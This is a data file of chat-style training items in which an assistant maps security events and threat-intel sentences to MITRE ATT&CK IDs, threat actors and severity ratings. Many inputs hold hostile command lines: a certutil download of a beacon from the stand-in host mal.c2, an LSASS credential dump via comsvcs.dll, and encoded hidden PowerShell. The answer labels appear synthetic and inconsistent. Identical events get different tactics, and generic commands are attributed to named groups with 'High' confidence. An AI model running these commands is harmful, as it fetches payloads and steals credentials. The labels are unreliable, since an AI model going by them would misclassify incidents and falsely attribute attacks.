messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.152.26.245", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"tech...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one.", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-5J86CWHZAL)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.61.48.65", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0006\"],...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.178.23.11", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"tec...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.149.168.176", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0003\", \"TA0006\"], \"techniques\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-TMD6FGCNEA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ryuk has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-3BVS783VWC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: 20 New processes The malicious svchost constantly queries ieframe.dll, as well as IWebBrowser2 Interface using CLSID dc30c1661-cdaf-11D0-8A3E-00c04fc9e26e, both key components to interact with Internet Explorer", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1164 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-2PSFE8NB1Z)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Defense Evasion, Persistence", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System Enable LUA=\"0\" and HKEY_CURRENT_USER\\Software\\DC3_FEXEC.", "role...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Regin leveraged several compromised universities as proxies to obscure its origin.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\", \"T1090.002\"]}", "role": "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2811 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.177.3.7", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1003.001\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ROKRAT can decrypt strings using the victim's hostname as the key.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-TIZY56YTIM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High\", \"b...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1634 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LoadPackagedLibrary()", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-XYGHZ2C2LY)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Privilege Escalation, Defense Evasion", "role...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3048 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.110.21.97", "role": "user" }, { "content": "{\"tactics\": [\"TA0011...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BS2005 uses Base64 encoding for communication in the message body of an HTTP request.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1327 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.141.33", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0007\"]...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-RL1YP43CY9)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Execution", "role": "user" }, { "content": "{\"sev...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: OSInfo queries the registry to look for information about Terminal Services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.130.45.48", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0010...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TrickBot has also used Nt* API functions to perform Process Injection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-Q64T04XBTZ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Initial Access, Collection", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-7LO3SZ9MZE)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": \"High...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Carberp has collected a list of running processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: AADInternals can gather information about a tenant’s domains using public Microsoft APIs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.001\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: An APT19 Port 22 malware variant registers itself as a service.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: VPN and to persist in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-YINS0P6R6W)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Defense Evasion", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.135.193.185", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-W7KNF7RFBW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": "{\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2137 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.178.106.57", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-J8VRV8MJA1)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Lateral Movement", "role": "user" }, { "content": "{\"sever...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SombRAT can enumerate services on a victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.34.112.63", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0001\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 774 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: UserInitMprLogonScript", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Carbanak checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode).", "role": "user" }, { "content": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.158.125.186", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.22.115.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniqu...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Waterbear can leverage API functions for execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-BSI8EXNQZ3)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control, Initial Access", "role": "user" }, { "cont...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Penquin can delete downloaded executables after running them.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 600 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techn...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3934 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.156.45.26", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1003....
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.75.228.145", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\"], \"techniques\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High\"}...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.46.241.171", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may generate these cookies in order to gain access to web resources.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.001\"]}", "role": "as...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1565.001\", \"T...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1464 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-HW7L1R04FI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Credential Access, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-YOOT35RAMT)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-P04ZBYG6FM)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Persistence", "role": "user" }, { "content": "...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.32.26.35", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0011\", \"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG <username> : Hello ,my name is  <IRC USER name>, Im ready my Computer Name is:<computer name>   All of the commands, except ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.82.154.78", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-FJC0H6EN19)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Privilege Escalation", "role": "user" }, { "content": "{...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"]...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2330 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.185.24.201", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-REGTV8QX4E)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Exfiltration", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-SV1LO6QVKX)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-YSCE9POCHP)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Lateral Movement, Exfiltration", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-2RKXKUD4PG)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2196 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OilRig has used macros to verify if a mouse is connected to a compromised machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.001\"]}", "ro...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1316 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.", "r...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-UVADKKELJZ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery, Impact, Credential Access", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-DU5F80W67C)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Execution", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2433 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3559 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...